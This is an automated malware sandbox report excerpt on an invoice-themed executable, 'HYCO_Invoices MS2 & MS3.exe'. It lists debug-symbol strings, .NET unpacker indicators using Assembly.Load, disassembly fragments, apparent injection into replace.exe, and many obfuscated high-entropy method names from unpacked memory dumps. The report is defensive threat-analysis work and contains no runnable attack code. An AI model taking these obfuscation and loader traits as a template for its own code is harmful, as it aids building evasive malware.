            Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs.Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs.Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs.Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00416023 push ds; ret 2_2_00416071
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00404834 push ebx; ret 2_2_00404835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040A036 push es; ret 2_2_0040A039
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004119A0 pushfd ; iretd 2_2_004119B2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00409A42 push ecx; ret 2_2_00409A46
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040D276 push ebx; retf 2_2_0040D29A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040D214 push ecx; iretd 2_2_0040D215
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00418B17 push ss; retf 2_2_00418B1B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004074E7 pushad ; iretd 2_2_004074F3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00403490 push eax; ret 2_2_00403492
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00409D5A push cs; retf 2_2_00409D5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00406524 push es; iretd 2_2_00406530
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004145D8 pushfd ; ret 2_2_004145D9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040CE54 push cs; iretd 2_2_0040CE5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF09AD push ecx; mov dword ptr [esp], ecx2_2_00FF09B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036709AD push ecx; mov dword ptr [esp], ecx5_2_036709B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E03091 push es; iretd 5_2_00E0309D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E04054 pushad ; iretd 5_2_00E04060
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1B010 push edx; ret 5_2_00E1B011
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E013A1 push ebx; ret 5_2_00E013A2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1231D push edi; retf 5_2_00E12328
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E065AF push ecx; ret 5_2_00E065B3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E0E50D pushfd ; iretd 5_2_00E0E51F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E15684 push ss; retf 5_2_00E15688
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1B62C pushad ; retf 5_2_00E1B62F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E068C7 push cs; retf 5_2_00E068C8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1FAD6 push es; iretd 5_2_00E1FADE
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1ABE0 push ebx; ret 5_2_00E1ABE1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E06BA3 push es; ret 5_2_00E06BA6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1FBB8 push edx; iretd 5_2_00E1FBD8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E12B90 push ds; ret 5_2_00E12BDE
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: section name: .text entropy: 7.956113865860276
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, kma1x54xuTiP9R11kj.csHigh entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, X1CrKNnxpMbljlKm9W.csHigh entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, PxLb1bcx15A1uXJ9Uc.csHigh entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, iZSt4ghAtFYRjZI1vg.csHigh entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, Ql8RokJdL51xRiqnMr.csHigh entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, uOkihsIx61umRTI2am.csHigh entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, SSYGWfDca6ipkM6C75.csHigh entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, S38KRJ2VkyZ1gfg8J9.csHigh entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, AYVbSx7pZJ3eY1l21R.csHigh entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, nBOhRD9uDmTdZtjJge.csHigh entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, QBCN3fMt5TmxSuJTjmm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, TgjSrj0uw35pWBoReq.csHigh entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xQiJO5us6DiOO5sIgg.csHigh entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.csHigh entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, lHvGJbLRUxqHjuNVyP.csHigh entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, f7t0WrYoXNeVinHJdg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, sir47mZZTPCbePi31b.csHigh entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, VBBrj4q7OxhL1AOEAN.csHigh entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, uRaCHDMK1mN0X9ZlUAA.csHigh entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, yVybD364GKpxs3MmaR.csHigh entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, VUpQ3JzfQcgbpyyG6Y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, NVc1yVXpcuL61Ykq2a.csHigh entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, kma1x54xuTiP9R11kj.csHigh entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, X1CrKNnxpMbljlKm9W.csHigh entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, PxLb1bcx15A1uXJ9Uc.csHigh entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, iZSt4ghAtFYRjZI1vg.csHigh entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, Ql8RokJdL51xRiqnMr.csHigh entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, uOkihsIx61umRTI2am.csHigh entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, SSYGWfDca6ipkM6C75.csHigh entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, S38KRJ2VkyZ1gfg8J9.csHigh entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, AYVbSx7pZJ3eY1l21R.csHigh entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, nBOhRD9uDmTdZtjJge.csHigh entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, QBCN3fMt5TmxSuJTjmm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, TgjSrj0uw35pWBoReq.csHigh entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xQiJO5us6DiOO5sIgg.csHigh entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.csHigh entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, lHvGJbLRUxqHjuNVyP.csHigh entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, f7t0WrYoXNeVinHJdg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, sir47mZZTPCbePi31b.csHigh entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, VBBrj4q7OxhL1AOEAN.csHigh entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, uRaCHDMK1mN0X9ZlUAA.csHigh entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, yVybD364GKpxs3MmaR.csHigh entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, VUpQ3JzfQcgbpyyG6Y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, NVc1yVXpcuL61Ykq2a.csHigh entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, kma1x54xuTiP9R11kj.csHigh entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, X1CrKNnxpMbljlKm9W.csHigh entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, PxLb1bcx15A1uXJ9Uc.csHigh entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, iZSt4ghAtFYRjZI1vg.csHigh entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, Ql8RokJdL51xRiqnMr.csHigh entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, uOkihsIx61umRTI2am.csHigh entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, SSYGWfDca6ipkM6C75.csHigh entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, S38KRJ2VkyZ1gfg8J9.csHigh entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, AYVbSx7pZJ3eY1l21R.csHigh entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, nBOhRD9uDmTdZtjJge.csHigh entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, QBCN3fMt5TmxSuJTjmm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, TgjSrj0uw35pWBoReq.csHigh entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
